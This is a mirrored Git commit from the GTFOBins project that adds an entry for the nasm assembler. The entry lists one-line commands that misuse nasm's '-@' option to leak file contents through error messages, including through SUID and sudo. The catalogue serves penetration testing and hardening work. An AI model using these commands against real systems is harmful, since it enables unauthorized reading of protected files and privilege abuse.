mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-01-24 04:22:52 +01:00
Add nasm
This commit is contained in:
parent
2faea12b6e
commit
d708c8b88b
16
_gtfobins/nasm.md
Normal file
16
_gtfobins/nasm.md
Normal file
@ -0,0 +1,16 @@
|
||||
---
|
||||
description: The file content is treated as command line options and disclosed throught error messages, so this is not suitable for reading arbitrary binary data.
|
||||
functions:
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
nasm -@ $LFILE
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./nasm -@ $LFILE
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo nasm -@ $LFILE
|
||||
---
|
Loading…
Reference in New Issue
Block a user